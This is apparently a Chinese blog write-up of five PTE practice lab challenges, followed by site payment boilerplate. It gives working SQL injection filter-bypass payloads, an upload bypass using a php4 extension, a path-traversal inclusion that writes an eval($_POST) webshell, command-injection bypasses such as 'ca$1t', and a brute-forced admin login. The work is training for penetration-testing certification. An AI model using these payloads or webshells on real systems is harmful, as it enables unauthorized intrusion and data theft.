PTE基础靶场

PTE基础靶场

一共5个,81、82、83、84、85

基础题目之SQL注入

http://192.168.253.99:81/index.php
image.png
查询语句
select * from article where id= (‘1’)
image.png
id=1’)#
image.png
image.png
空格用%0a过滤
?id=1’)order%0Aby%0A5%23
image.png
?id=1’)order%0Aby%0A4%23
image.png
union复写过滤
?id=-1’)ununionion%0Aselect%0A1,2,3,4%23
image.png
load_file(%27/tmp/360/key%27)查key
?id=-1’)ununionion%0Aselect%0A1,load_file(‘/tmp/360/key’),3,4%23
image.png

基础题目之文件上传突破

image.png
随便上传个木马,没反应,发现只有普通图片可以上传
image.png
抓包添加一句话,更改后缀名php2、php3、php4等
php4上传成功
image.png
蚁剑连接
image.png
找到key
find / -name key.php
image.png
image.png

find / -name key.php 2>/dev/null
image.png

基础题目之文件包含

image.png
页面url
http://192.168.253.99:83/vulnerabilities/fu1.php?file=view.html
image.png
?file=…/…/etc/passwd
存在文件包含
image.png
http://192.168.253.99:83/vulnerabilities/fu1.php?file=…/key.php
直接读取发现读不到php代码内容
image.png
伪协议写入木马

<?php fputs(fopen('1.php', 'w'),'<?php eval($_POST[cmd]); ?>'); ?>

image.png

image.png

蚁剑连接
image.png
image.png

基础题目之命令执行

image.png
执行命令,发现过滤了多数命令
image.png
方法1:
绕过$1,因为linux中没有定义遍历$1,所以为空,后续就是执行cat …/key.php
127.0.0.1|ca$1t …/key.php
image.png
查看源码
image.png
方法2:
利用grep获取key.php文件内容
127.0.0.1|grep ‘key’ …/key.php
image.png

基础题目之日志分析

image.png
直接搜索 172.16.12.12
image.png
发现后台 http://192.168.253.99:85/adminlogin.php
image.png
万能密码不管用,直接爆破
image.png
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值